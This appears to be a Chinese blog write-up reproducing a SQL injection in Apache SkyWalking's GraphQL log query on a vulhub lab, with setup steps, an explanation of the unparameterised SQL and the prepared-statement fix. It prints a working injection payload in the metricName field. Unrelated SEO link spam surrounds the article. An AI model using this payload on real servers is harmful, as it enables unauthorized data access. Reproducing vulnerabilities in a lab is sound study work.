当前位置: 首页 > news >正文

微网站 建设wordpress常用版本

微网站 建设,wordpress常用版本,机票网站建设公司,教育培训网站抄袭漏洞概述 当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参…

漏洞概述

当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参数。

环境搭建

拉取vulhub

git clone https://github.com/vulhub/vulhub.git

搭建镜像

cd /vulhub/skywalking/8.3.0-sqli
docker-compose up -d

在这里插入图片描述
访问8080端口
在这里插入图片描述

漏洞复现

在首页刷新即可抓到报文。
在这里插入图片描述

输入payload

{"query":"query queryLogs($condition: LogQueryCondition) {queryLogs(condition: $condition) {totallogs {serviceIdserviceNameisErrorcontent}}
}
","variables":{"condition":{"metricName":"INFORMATION_SCHEMA.USERS union all select h2version())a where 1=? or 1=? or 1=? --","endpointId":"1","traceId":"1","state":"ALL","stateCode":"1","paging":{"pageSize":10}}}
}

查看返回结果
在这里插入图片描述
在这里插入图片描述

漏洞复现成功

漏洞原理

源码:https://github.com/apache/skywalking/releases/tag/v8.3.0
graphql是skywalking的一种查询协议,如果请求以下列JSON给出:

{bookById(id: "book-1"){idnamepageCountauthor {firstNamelastName}}
}

则返回结果为:

{"bookById": {"id":"book-1","name":"Harry Potter and the Philosopher's Stone","pageCount":223,"author": {"firstName":"Joanne","lastName":"Rowling"}}
}

通常,graphql中会对对象类型进行定义:

type Query {bookById(id: ID): Book
}type Book {id: IDname: StringpageCount: Intauthor: Author
}type Author {id: IDfirstName: StringlastName: String
}

此次产生漏洞的queryLogs为:
oap-server\server-query-plugin\query-graphql-plugin\src\main\resources\query-protocol\log.graphqls:
(这里不知道为什么下载的源码中没有,只能跑到github上看)
在这里插入图片描述

oap-server\server-query-plugin\query-graphql-plugin\src\main\java\org\apache\skywalking\oap\query\graphql\resolver\LogQuery.java
在这里插入图片描述

oap-server\server-storage-plugin\storage-jdbc-hikaricp-plugin\src\main\java\org\apache\skywalking\oap\server\storage\plugin\jdbc\h2\dao\H2LogQueryDAO.java
在这里插入图片描述

采取了直接拼接的方式。

5、修复方法
修复后使用了占位符,即预编译。

http://www.yayakq.cn/news/753947/

相关文章:

  • 域名升级seo顾问是什么
  • 广州定制型网站企业网站优化的原则
  • c语言做网站贡嘎网站建设
  • 商务网站建设实训心得体会网站域名做链接怎么做
  • 哪家公司网站做的比较好营销型网站定义
  • 山西做网站的企业网站备案相关前置许可
  • 福州网站制作案例两江新区建设管理局网站
  • 网站首页大图尺寸山东网站建设SEO优化制作设计公司
  • 湖南做网站最厉害的公司芜湖做网站需要多少钱
  • 网站栏目模块少儿教育网站建设价格
  • 餐饮设计公司网站苏格网站建设
  • 多个域名绑定同一个网站wordpress自定义按钮
  • 那家做网站好谁帮58同城做的网站
  • 贵州省城乡建设局网签网站卖网格布怎样做网站
  • 即刻搜索收录网站为何公司做的网站很丑
  • 淘客网站怎么做淘口令家装软装设计 上海
  • 浙江省邮电工程建设有限公司 网站上传文件到网站根目录
  • 东莞网站建设运营怎么把网站源码
  • 全网通官方网站海南省海洋监测预报中心
  • 互联网金融型网站开发品牌设计与vi设计的区别
  • 深圳网站. 方维网络广州建工集团有限公司官网
  • 帝国cms 网站地图插件网站开发 用什么框架
  • 看网站有没有做404创建网站app
  • 哪有做课件赚钱的网站wordpress 简繁体 插件
  • 天津建网站广西网站建设流程
  • 备案网站可以做接码平台么石家庄高端网站制作
  • 网站域名到期查询婚纱网站html模板
  • 毕节网站建设腾讯推广联盟
  • 专业的建网站公司地址中国物联网公司排名
  • asp在网站制作中的作用如何重新做公司网站